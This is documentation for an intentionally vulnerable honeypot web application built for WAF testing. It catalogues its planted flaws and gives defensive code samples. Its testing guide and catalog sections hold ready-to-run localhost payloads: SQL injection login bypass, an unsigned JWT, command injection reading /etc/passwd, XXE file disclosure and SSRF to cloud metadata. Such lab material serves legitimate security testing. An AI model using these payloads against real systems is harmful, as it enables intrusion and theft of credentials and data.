Chimera Vulnerability Inventory
This application contains intentional security vulnerabilities for WAF testing. NEVER deploy to production or expose to the internet without proper WAF protection.
Overview
The Chimera application (vuln-api) is a Starlette/uvicorn honeypot designed
for WAF testing and security education. The formal vulnerability source of truth
is apps/vuln-api/app/utils/vuln_registry.py, which currently registers 29
CHM-ID vulnerabilities. Broader endpoint-level and code-pattern findings still
exist in the application, but they are being reconciled under TASK-17 before
this inventory treats them as counted catalog entries.
Quick Statistics
Registry Reconciliation Status
TASK-17 found that older documentation overstated the structured catalog by
describing “200+” vulnerabilities while the registry exposes 29 CHM-ID entries.
This page now counts only registered entries. Unregistered but intentional
attack patterns remain visible in the codebase and examples below; they should
either be added to VULN_REGISTRY or kept out of counted inventory totals.
Known reconciliation gaps:
- CHM-BANK-001 references POST /api/v1/banking/transfer, which is not a live route in the current banking blueprint.
- CHM-SAAS-002 references PUT /api/v1/saas/tenants/{tenant_id}; the closest live route is the tenant settings endpoint.
- database_vulnerable/routes.py contains eight explicit SQL injection routes but no CHM-ID registry entries yet.
- Only CHM-BANK-002 currently has asserted X-Chimera-Vuln-ID hotpatch tests; most registered vulnerabilities still need test coverage that asserts exploitability directly.
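The first and third gaps above are the two directions of one check: registry entries with no live route, and live routes with no registry entry. The sketch below is an added example, not code from the Chimera project; the registry shape, the route table and the /api/v1/database/users path are assumptions constructed for illustration.

```python
import re

# Constructed sample data: five registry endpoints copied from the catalog on
# this page, plus a hypothetical route table (not the app's real routes).
REGISTRY = {
    "CHM-BANK-001": "POST /api/v1/banking/transfer",
    "CHM-BANK-002": "GET /api/v1/banking/accounts",
    "CHM-GOV-001": "GET /api/v1/gov/benefits/search?q=",
    "CHM-GOV-002": "GET /api/v1/gov/benefits/search",
    "CHM-SAAS-001": "GET /api/v1/saas/tenants/{tenant_id}/projects",
}
LIVE_ROUTES = [
    ("GET", "/api/v1/banking/accounts"),
    ("GET", "/api/v1/gov/benefits/search"),
    ("GET", "/api/v1/saas/tenants/{tid}/projects"),
    ("GET", "/api/v1/database/users"),  # hypothetical unregistered route
]


def normalize(method, path):
    """Canonical key: upper-case method, no query string, anonymous params."""
    path = path.split("?", 1)[0].rstrip("/") or "/"
    path = re.sub(r"\{[^}]*\}", "{}", path)
    return method.upper() + " " + path


def reconcile(registry, live_routes):
    """Return (registry IDs with no live route, live routes with no ID)."""
    live = {normalize(m, p) for m, p in live_routes}
    registered = {}
    for vuln_id, endpoint in registry.items():
        method, path = endpoint.split(" ", 1)
        # Several IDs may share one endpoint (e.g. the two CHM-GOV entries).
        registered.setdefault(normalize(method, path), []).append(vuln_id)
    stale = sorted(i for key, ids in registered.items()
                   if key not in live for i in ids)
    unregistered = sorted(live - set(registered))
    return stale, unregistered


if __name__ == "__main__":
    stale, unregistered = reconcile(REGISTRY, LIVE_ROUTES)
    print("registered, no live route:", stale)
    print("live, no CHM-ID:", unregistered)
```

Run as a CI step, a non-empty result in either direction fails the build until the entry is added to the registry or removed from the counted totals.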
Vulnerability Categories
Registered Security Flaws
| Category | Registered count | Examples |
|---|---|---|
| Broken Access Control / IDOR | 13 | Cross-tenant SaaS access, medical record IDOR, subscriber/profile IDOR |
| Injection | 7 | SQL injection, command injection, reflected XSS |
| Business Logic Flaws | 3 | Transfer manipulation, SIM swap, loyalty points manipulation |
| SSRF | 2 | Energy utility callbacks, diagnostic webhooks |
| Security Misconfiguration | 1 | XXE in legacy import behavior |
| LLM Prompt Injection | 1 | Direct/indirect GenAI prompt injection |
| LLM Insecure Output Handling | 1 | Agent browse SSRF behavior |
| LLM Sensitive Information Disclosure | 1 | Model configuration exposure |
Registered CHM-ID Catalog
| ID | Severity | Portal | Endpoint | Name |
|---|---|---|---|---|
| CHM-BANK-001 | critical | banking | POST /api/v1/banking/transfer | Business Logic Manipulation (Transfer) |
| CHM-BANK-002 | high | banking | GET /api/v1/banking/accounts | BOLA / IDOR (Accounts) |
| CHM-HEALTH-001 | critical | healthcare | GET /api/v1/healthcare/records/search?q= | SQL Injection (Search) |
| CHM-HEALTH-002 | high | healthcare | GET /api/v1/healthcare/records/{record_id} | Broken Object Level Authorization (BOLA/IDOR) |
| CHM-HEALTH-003 | high | healthcare | GET /api/v1/healthcare/records | PHI Data Exposure |
| CHM-ECOM-001 | high | ecommerce | GET /api/v1/ecommerce/products/search?query= | Reflected XSS (Search) |
| CHM-ECOM-002 | critical | ecommerce | GET /api/v1/ecommerce/products | SQL Injection (Catalog) |
| CHM-SAAS-001 | critical | saas | GET /api/v1/saas/tenants/{tenant_id}/projects | Cross-Tenant IDOR |
| CHM-SAAS-002 | high | saas | PUT /api/v1/saas/tenants/{tenant_id} | Mass Assignment (Tenant Profile) |
| CHM-GOV-001 | critical | government | GET /api/v1/gov/benefits/search?q= | SQL Injection (Benefits Search) |
| CHM-GOV-002 | high | government | GET /api/v1/gov/benefits/search | PII Exposure (Search Results) |
| CHM-TELCO-001 | high | telecom | GET /api/v1/telecom/subscribers/{subscriber_id}/profile | BOLA / IDOR (Subscriber Profile) |
| CHM-TELCO-002 | critical | telecom | POST /api/v1/telecom/subscribers/{subscriber_id}/sim-swap | Broken Business Logic (SIM Swap) |
| CHM-ENERGY-001 | high | energy_utilities | POST /api/v1/energy-utilities/assets/calibration | Server-Side Request Forgery (SSRF) |
| CHM-ENERGY-002 | medium | energy_utilities | GET /api/v1/energy-utilities/outages/{outage_id} | BOLA / IDOR (Outages) |
| CHM-ICS-001 | critical | ics_ot | POST /api/ot/protocols/modbus | Remote Command Injection (Modbus) |
| CHM-ICS-002 | high | ics_ot | GET /api/ics/controllers/status | BOLA / IDOR (Controller Status) |
| CHM-ICS-003 | medium | ics_ot | GET /api/ics/scada/systems | Unauthorized System Discovery |
| CHM-INS-001 | high | insurance | GET /api/v1/insurance/policies/{policy_id} | BOLA / IDOR (Policies) |
| CHM-INS-002 | critical | insurance | GET /api/v1/insurance/claims/search?q= | SQL Injection (Claims Search) |
| CHM-LOYAL-001 | critical | loyalty | POST /api/loyalty/points/transfer | Business Logic Manipulation (Points) |
| CHM-LOYAL-002 | high | loyalty | GET /api/loyalty/transactions/export?customer_id= | BOLA / IDOR (Transactions) |
| CHM-ADMIN-001 | critical | admin | POST /api/v1/diagnostics/ping | Remote Command Execution (Ping) |
| CHM-ADMIN-002 | high | admin | POST /api/v1/diagnostics/webhook | Server-Side Request Forgery (Webhook) |
| CHM-ADMIN-003 | high | admin | POST /api/v1/admin/attack/xxe | XML External Entity (Legacy Import) |
| CHM-AI-001 | critical | genai | POST /api/v1/genai/chat | Prompt Injection (Direct/Indirect) |
| CHM-AI-002 | critical | genai | POST /api/v1/genai/agent/browse | Server-Side Request Forgery (SSRF) via Agent |
| CHM-AI-003 | high | genai | GET /api/v1/genai/models/config | Sensitive Data Exposure (Model Config) |
| CHM-AI-004 | high | genai | POST /api/v1/genai/knowledge/upload | Unrestricted File Upload (RAG) |
Authentication & Authorization Vulnerabilities
Critical Authentication Flaws
JWT Vulnerabilities
POST /api/v1/auth/login
X-JWT-Algorithm: none
- Algorithm Confusion: Accepts “none” algorithm
- Unsigned Tokens: Base64-only tokens accepted
- No Signature Verification: Complete bypass possible
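For contrast with the behaviour listed above, a verifier that pins the algorithm and rejects unsigned tokens looks like the following. This is an added example, not code from the Chimera project; the secret and the function names are assumptions, and only the Python standard library is used.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-secret"  # assumption: sample key for this example
# Unsigned token from this page's testing guide; its header is {"alg":"none"}.
UNSIGNED = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ."


def b64url_decode(segment):
    """Decode base64url, restoring the padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def b64url_encode(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(claims, key):
    """Issue a signed HS256 token (here only to build a valid sample)."""
    header = b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    body = b64url_encode(json.dumps(claims).encode())
    mac = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(mac)}"


def verify_hs256(token, key):
    """Return the claims of a correctly signed HS256 token, else raise."""
    parts = token.split(".")
    if len(parts) != 3 or not all(parts):
        raise ValueError("token must have three non-empty segments")
    header = json.loads(b64url_decode(parts[0]))
    # The algorithm is fixed server-side; neither the token header nor a
    # request header such as X-JWT-Algorithm may select it.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    signed = f"{parts[0]}.{parts[1]}".encode()
    expected = hmac.new(key, signed, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(parts[2])):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(parts[1]))
```

A WAF rule for this class can apply the same first two checks without the key: an empty third segment or a decoded header whose alg is not the expected value is enough to block.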
SQL Injection Login Bypass
curl -X POST http://localhost:8080/api/v1/auth/login \
-d '{"username":"admin'\'' OR '\''1'\''='\''1","password":"any"}'
- Direct string concatenation in queries
- Returns admin privileges without password
Token Forgery Endpoint
POST /api/oauth/token/forge
- Generates valid JWT for any user
- No authentication required
- Complete authentication bypass
Weak Cryptography
| Vulnerability | Endpoints | Details |
|---|---|---|
| MD5 Password Hashing | /auth/login, /auth/register | Rainbow table attacks possible |
| Predictable Tokens | /auth/forgot, /auth/reset | MD5(email+timestamp) |
| Weak Session IDs | /auth/login | MD5(timestamp) |
| Predictable API Keys | /auth/apikeys/create | MD5(user_id+timestamp) |
| Weak TOTP Secrets | /auth/mfa/enable | MD5(user_id)[:16] |
Timing Attacks
# Valid user: 0.15s delay
# Invalid user: 0.05s delay
- User enumeration via response time
- Applies to: /auth/login, /auth/forgot
Banking & Financial Vulnerabilities
Critical Financial Flaws
Race Condition in Transfers
POST /api/v1/banking/transfer
# Check balance
if source_balance >= amount:
    time.sleep(0.001)  # Race window
    # Deduct from source
    # Add to destination
- Non-atomic transactions
- Double-spend possible
- Concurrent transfers can overdraw
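The corrected form of the check-then-debit sequence above holds one lock across the balance check and both updates, so the race window no longer matters. This is an added example, not code from the Chimera project; the Ledger class and the in-memory balances are assumptions, and a database-backed service would get the same guarantee from a transaction with a conditional update.

```python
import threading
import time


class Ledger:
    """In-memory accounts whose check-and-debit runs as one atomic step."""

    def __init__(self, balances):
        self.balances = dict(balances)
        self._lock = threading.Lock()

    def transfer(self, src, dst, amount):
        """Move funds; return False instead of overdrawing the source."""
        if amount <= 0 or src == dst:
            return False
        with self._lock:  # no other transfer can run between check and debit
            if self.balances[src] < amount:
                return False
            time.sleep(0.001)  # same window as the page's snippet, now harmless
            self.balances[src] -= amount
            self.balances[dst] += amount
            return True


def concurrent_transfers(ledger, src, dst, amount, attempts):
    """Start `attempts` simultaneous transfers; return how many succeeded."""
    outcomes = []
    barrier = threading.Barrier(attempts)

    def worker():
        barrier.wait()  # release every thread at the same moment
        outcomes.append(ledger.transfer(src, dst, amount))

    threads = [threading.Thread(target=worker) for _ in range(attempts)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(outcomes)


if __name__ == "__main__":
    ledger = Ledger({"A": 100, "B": 0})  # constructed sample balances
    print(concurrent_transfers(ledger, "A", "B", 30, 20), ledger.balances)
```

The invariant worth asserting in a regression test is that the source balance never goes negative and the total across accounts is unchanged, whatever the thread count.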
Balance Manipulation
POST /api/v1/banking/internal/reset-balance
{
"account_id": "any-account",
"new_balance": 1000000
}
- No authentication required
- Arbitrary balance setting
- Financial fraud enabled
Transaction Vulnerabilities
| Endpoint | Vulnerability | Impact |
|---|---|---|
| /banking/accounts | IDOR | View any user’s accounts |
| /banking/transactions | IDOR | View any account’s transactions |
| /banking/statements | IDOR | Download any account’s statements |
| /banking/transfer/bulk | No atomicity | Partial transfer failures |
| /banking/accounts/enumerate | Account enumeration | Reconnaissance |
Payment Processing Flaws
Capture Exceeds Authorization
POST /api/v1/payments/capture
{
"authorization_id": "auth_123",
"capture_amount": 10000 // Authorized: 100
}
Returns: "overage": 9900
Refund Exceeds Original
POST /api/v1/payments/refund
{
"transaction_id": "txn_123",
"refund_amount": 10000 // Original: 100
}
- Money laundering possible
- No validation on amounts
Healthcare & HIPAA Violations
Critical PHI Exposure
Mass Medical Records Export
GET /api/v1/healthcare/records
Returns ALL records with:
- SSN, DOB, diagnosis
- Medications, allergies
- Insurance information
- No authentication required
Genetic Data Exposure
GET /api/medical/genetics/profiles
Exposes:
- BRCA1/2 cancer risk genes
- APOE4 Alzheimer’s risk
- Pharmacogenomics data
- Ancestry information
- Discrimination risk: Employment, insurance
Mental Health Records
GET /api/medical/mental-health/sessions
Exposes:
- Therapy session notes
- Psychiatric diagnoses
- Risk assessments (suicide, self-harm)
- Medications prescribed
Controlled Substances
DEA Schedule II-IV Exposure
GET /api/v1/healthcare/prescriptions
Returns:
- Oxycodone, Hydrocodone (Schedule II)
- Alprazolam (Schedule IV)
- Adderall (Schedule II)
- Provider DEA numbers
- Prescription fraud risk
HIPAA Compliance Violations
| Violation | Endpoint | Details |
|---|---|---|
| Audit Log Tampering | /api/hipaa/audit-logs | Can delete/modify audit trails |
| Unencrypted PHI Transfer | /api/hipaa/transfer/encrypted | Returns encryption: none |
| Bulk PHI Export | /api/hipaa/export/bulk | Mass data exfiltration |
| No Access Controls | All healthcare endpoints | No authentication/authorization |
Admin & System Vulnerabilities
Remote Code Execution
Direct Command Execution
POST /api/v1/admin/execute
{
"command": "cat /etc/passwd"
}
- No input validation
- Full system compromise
- No authorization required
Command Injection
POST /api/v1/admin/backup
{
"backup_path": "/tmp; cat /etc/passwd"
}
- Via backup operations
- Detects: ;, |, &, $, `
Privilege Escalation
Elevate Any User to Admin
POST /api/v1/admin/users/{user_id}/elevate
- No authentication check
- Self-elevation possible
- Complete access control bypass
Configuration Exposure
GET /api/v1/admin/config
Returns:
- Database credentials
- AWS access keys
- Stripe API keys
- JWT secrets
- Encryption keys
System Information Disclosure
GET /api/system/version
Exposes:
- Application version
- Python version
- Starlette / uvicorn version
- OS information
- CVE reconnaissance enabled
Advanced Attack Vectors
XXE Injection
POST /api/hipaa/system/configuration
Content-Type: application/xml
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>&xxe;</config>
- File disclosure
- SSRF possible
- Configuration endpoint
SSRF Vulnerabilities
POST /api/hipaa/transfer/encrypted
{
"destination": "http://169.254.169.254/latest/meta-data/"
}
- Cloud metadata access
- Internal network scanning
- Credential harvesting
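On the mitigation side, a destination check for an endpoint like this combines a host allowlist with a test on every address the host resolves to. This is an added example, not code from the Chimera project; the function names, the partner.example host and the injected resolver are assumptions for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit


def resolve(host):
    """Default resolver: every address the name currently maps to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def check_destination(url, allowed_hosts, resolver=resolve):
    """Return the vetted addresses for url, or raise ValueError."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise ValueError(f"scheme {parts.scheme!r} not allowed")
    host = (parts.hostname or "").lower()
    if host not in allowed_hosts:
        raise ValueError(f"host {host!r} is not on the allowlist")
    addresses = resolver(host)
    if not addresses:
        raise ValueError(f"host {host!r} did not resolve")
    for addr in addresses:
        # is_global is False for link-local space (169.254.0.0/16, which
        # holds the metadata address), loopback, RFC 1918 and similar ranges.
        if not ipaddress.ip_address(addr).is_global:
            raise ValueError(f"{host} resolves to internal address {addr}")
    return addresses


if __name__ == "__main__":
    allow = {"partner.example"}  # hypothetical allowlisted callback host
    fake_dns = {"partner.example": ["169.254.169.254"]}  # constructed answer
    try:
        check_destination("https://partner.example/cb", allow, fake_dns.get)
    except ValueError as exc:
        print("blocked:", exc)
```

The outbound request should connect to one of the returned addresses rather than resolving the name a second time, otherwise a changed DNS answer between check and use defeats the validation.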
Insecure Deserialization
POST /api/admin/attack/deserialize
{
"data": "base64_pickle_payload"
}
- Python pickle exploitation
- Remote code execution
- Command execution
Attack Simulation Endpoints
The application includes an entire attack simulation blueprint with:
Reconnaissance
- /api/recon/advanced - External services, tech stack
- /api/intelligence/gather - Executive data, credentials
- /api/employees/directory - All employee emails/roles
- /api/technologies/stack - Complete tech disclosure
Exploitation
- /api/lateral/movement - Network traversal paths
- /api/privilege/escalation - Exploit simulation
- /api/credentials/harvest - Plaintext passwords
- /api/vulnerabilities/scan - CVE findings
Persistence
- /api/persistence/establish - Scheduled tasks
- /api/backdoors/install - DNS tunneling, covert channels
- /api/domain/admin/impersonate - Kerberos tickets
Data Exfiltration
- /api/exfiltration/channels - DNS/ICMP/steganography
- /api/communication/covert - C2 infrastructure
- /api/data/collect - Automated harvesting
OWASP Top 10 Coverage
| OWASP Category | Registered CHM-ID count | Examples |
|---|---|---|
| A01: Broken Access Control | 13 | BOLA, IDOR, excessive data exposure |
| A03: Injection | 7 | SQL, command, XSS |
| A04: Insecure Design | 3 | Business logic manipulation |
| A05: Security Misconfiguration | 1 | XXE legacy import behavior |
| A10: SSRF | 2 | Energy utility and diagnostic SSRF |
| LLM01: Prompt Injection | 1 | Direct/indirect prompt injection |
| LLM02: Insecure Output Handling | 1 | Agent browse behavior |
| LLM06: Sensitive Information Disclosure | 1 | Model configuration exposure |
Other OWASP categories are represented by endpoint examples and route behavior
elsewhere in the app, but they are not yet registered with CHM-IDs and should
not be counted as catalog coverage until TASK-17 adds or rejects them.
Compliance Violations
Regulatory Non-Compliance
| Regulation | Violations | Examples |
|---|---|---|
| HIPAA | Massive PHI exposure | No encryption, audit tampering, bulk export |
| PCI DSS | Card data mishandling | CVV references, excessive storage, weak crypto |
| GDPR | Privacy violations | Mass PII export, no consent, no access controls |
| SOX | Financial manipulation | Audit destruction, balance tampering |
| AML/KYC | Money laundering | Transaction structuring, insufficient verification |
Testing Guide
Quick Exploitation Examples
Authentication Bypass
# SQL Injection
curl -X POST http://localhost:8080/api/v1/auth/login \
-d '{"username":"admin'\'' OR '\''1'\''='\''1","password":"x"}'
# JWT None Algorithm
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ."
# Token Forgery
curl -X POST http://localhost:8080/api/oauth/token/forge
Data Exfiltration
# Export all users
curl http://localhost:8080/api/v1/admin/users/export
# Export medical records
curl http://localhost:8080/api/v1/healthcare/records
# Export genetic data
curl http://localhost:8080/api/medical/genetics/profiles
Remote Code Execution
# Direct command execution
curl -X POST http://localhost:8080/api/v1/admin/execute \
-d '{"command":"cat /etc/passwd"}'
# Command injection
curl -X POST http://localhost:8080/api/v1/admin/backup \
-d '{"backup_path":"/tmp; ls -la /"}'
Financial Fraud
# Reset account balance
curl -X POST http://localhost:8080/api/v1/banking/internal/reset-balance \
-d '{"account_id":"ACC001","new_balance":1000000}'
# Capture more than authorized
curl -X POST http://localhost:8080/api/v1/payments/capture \
-d '{"authorization_id":"auth_123","capture_amount":10000}'
Vulnerability Density by Module
[Figure: vulnerability density for the Authentication, Admin, Healthcare, Banking and Payments modules]
Usage Warning
This application is designed for security testing in isolated environments only. It contains real exploit code and should NEVER be deployed to production or exposed to the internet without proper WAF protection.
Safe Usage Guidelines
- Isolated Environment Only - Run in Docker/VM with no external access
- WAF Protection Required - Always run behind Chimera WAF for demos
- Regular Resets - Reset data frequently to prevent accumulation
- Access Control - Limit access to authorized security personnel
- No Real Data - Never use actual PII, PHI, or financial data
Related Documentation
- API Documentation - Complete API reference
- Endpoints Catalog - All endpoints with parameters
- Attack Simulation - Attack pattern reference
- Getting Started - Setup and configuration
Last Updated: June 2026
Registered Vulnerabilities: 29 CHM-ID entries
Broader unregistered attack surface: under TASK-17 reconciliation